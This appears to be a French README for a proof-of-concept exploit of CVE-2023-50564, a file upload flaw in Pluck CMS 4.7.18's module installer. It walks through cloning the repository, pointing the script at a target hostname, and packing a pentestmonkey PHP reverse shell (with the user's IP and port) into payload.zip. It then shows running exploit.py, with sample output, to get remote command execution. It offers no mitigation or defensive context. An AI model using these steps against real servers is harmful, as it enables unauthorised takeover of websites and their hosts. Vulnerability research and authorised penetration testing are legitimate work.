
Une preuve de concept pour la vulnérabilité CVE-2023-50564 dans Pluck CMS version 4.7.18
Ce dépôt contient une preuve de concept de la vulnérabilité CVE-2023-50564 dans Pluck CMS version 4.7.18

CVE-2023-50564 est une vulnérabilité qui permet des téléchargements de fichiers non autorisés dans Pluck CMS version 4.7.18. Cette exploitation tire parti d’une faille dans la fonction d’installation de modules pour télécharger un fichier ZIP contenant un shell PHP, permettant ainsi l’exécution de commandes à distance.
requests et requests_toolbeltVous pouvez installer les paquets nécessaires avec la commande suivante :
pip install requests requests_toolbelt
git clone https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC.git
cd CVE-2023-50564_Pluck-v4.7.18_PoC
Remplacez <hostname> par le nom de domaine ou l’adresse IP de la cible dans le script PoC.
Créez un fichier payload.zip contenant shell.php. Je recommande le reverse shell PHP de pentestmonkey et remplacez les champs <your_ip> et <port> par votre IP et votre port d’écoute.
Exécutez le script PoC :
python exploit.py
Vous serez invité à saisir le chemin vers le fichier ZIP :
ZIP file path: ./path/to/payload.zip
Login successful
ZIP file uploaded successfully.
<output of the executed shell.php>
ZIP file upload error. Response code: <code>
Assurez-vous que le fichier shell.php contient le bon reverse shell et que votre écouteur attend la connexion sur le port spécifié.